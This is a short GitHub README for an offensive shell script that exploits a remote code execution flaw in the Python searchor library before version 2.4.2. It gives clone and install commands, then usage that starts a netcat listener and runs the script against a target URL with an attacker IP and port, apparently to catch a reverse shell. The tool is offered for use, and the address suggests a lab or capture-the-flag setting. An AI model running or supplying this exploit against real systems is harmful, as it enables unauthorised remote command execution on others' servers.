/searchor-rce-script

This is a basic custom sh script for searchor library (python) < 2.4.2 (more exactly 2.4.0)

Primary LanguageShell

Basic usage

Installation

git clone https://github.com/874anthony/searchor-rce-script.git
cd searchor-rce-script
chmod +x searchor-rce.sh

Usage

nc -lvnp 2566 (In another terminal)
./searchor-rce.sh -u http://example.com -h 10.10.14.176 -p 2566

Credits

This script was based on this issue